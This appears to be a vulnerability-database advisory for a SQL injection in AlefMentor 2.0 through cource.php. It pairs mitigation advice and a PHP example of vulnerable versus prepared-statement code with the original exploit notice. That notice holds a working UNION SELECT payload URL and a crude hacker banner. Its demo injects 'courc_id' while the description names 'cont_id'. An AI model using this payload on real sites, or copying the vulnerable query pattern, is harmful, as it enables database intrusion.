Vendor: AlefMentor
Author: Red-D3v1L
CVSS: 7.5 (HIGH)
Vulnerability type: Remote SQL Injection
Product Name: AlefMentor
Affected Version From: AlefMentor 2.0
Affected Version To: 5
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

AlefMentor 2.0 Remote SQL Injection Vulnerability

The vulnerability exists in AlefMentor 2.0, where an attacker can inject SQL queries through the 'cont_id' parameter in the 'cource.php' file. This can lead to unauthorized access or manipulation of the database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Additionally, implementing parameterized queries or using an ORM (Object Relational Mapping) can provide protection against SQL injection attacks.
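The following PHP is an added illustration of that mitigation; it is not AlefMentor's code (the real cource.php source is not reproduced on this page). It reconstructs, hypothetically, a handler that splices the 'cont_id' and 'courc_id' values straight into the SQL text, next to a hardened version that validates both identifiers as integers and binds them through a PDO prepared statement. The table and column names, the $pdo connection and the function names are assumptions.

```php
<?php
// Added example, not AlefMentor's code. Table/column names, $pdo and the
// function names are assumptions made for illustration only.

// VULNERABLE pattern: request values are concatenated into the query text, so
// whatever follows cont_id= or courc_id= is parsed by MySQL as part of the SQL.
function fetchContentVulnerable(PDO $pdo, array $get): array
{
    $contId  = $get['cont_id']  ?? '';
    $courcId = $get['courc_id'] ?? '';
    $sql = "SELECT id, title, body FROM contents "
         . "WHERE id = $contId AND course_id = $courcId";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// HARDENED: (1) accept only a plain non-negative integer for each identifier
// and reject the request otherwise; (2) send the SQL and the values separately
// through a prepared statement, so a value can never change the query text.
function requireIntParam(array $get, string $name): int
{
    $raw = $get[$name] ?? null;
    // FILTER_VALIDATE_INT returns false for anything that is not an integer
    // literal, so a value such as "-2 union select ..." stops here.
    $value = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($value === false) {
        http_response_code(400);
        exit('Invalid request');
    }
    return $value;
}

function fetchContentHardened(PDO $pdo, array $get): array
{
    $contId  = requireIntParam($get, 'cont_id');
    $courcId = requireIntParam($get, 'courc_id');
    $stmt = $pdo->prepare(
        'SELECT id, title, body FROM contents WHERE id = :cont AND course_id = :course'
    );
    $stmt->bindValue(':cont',   $contId,  PDO::PARAM_INT);
    $stmt->bindValue(':course', $courcId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Hypothetical wiring. Disabling emulated prepares makes the driver send the
// statement and its parameters to the server separately (native prepares).
// $pdo = new PDO('mysql:host=localhost;dbname=alefmentor', $user, $pass,
//     [PDO::ATTR_EMULATE_PREPARES => false, PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
// if (($_GET['action'] ?? '') === 'pregled') { $rows = fetchContentHardened($pdo, $_GET); }
```

An ORM gives the same protection only as long as every query it issues is built from bound parameters; raw query strings assembled from request data reintroduce the problem.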

Exploit-DB raw data:

==============================================================================
        [ª] ~ Note : Hacker R0x Lamerz Sux !
==============================================================================
        [ª]  AlefMentor 2.0  <== 5.0 (id) Remote SQL Injection Vulnerability
==============================================================================
    [ª] my home:              [ http://sec-r1z.com ]
    [ª] Script:                    [ AlefMentor 2.0 ]
    [ª] Language:             [ PHP ]
    [ª] Download             [ http://alefmentor.mac.findmysoft.com/ ]
    [ª] Founder:               [ ./Red-D3v1L ]
    [ª] Gr44tz to:             [ sec-r1z# Crew - Hackteach Team - my love :$ ]
    [ª] Fuck to :               [ All LamErZ And n00bz ]
########################################################################

===[ Exploit SQL ]===  

 [ª] [Path]/cource.php?action=pregled&cont_id=[SQL]

 [ª] Live dem0 : 

http://www.site.com/am/cource.php?action=pregled&cont_id=21&courc_id=-2+union+select+version%28%29--


Author: Red-D3v1L <-

###########################################################################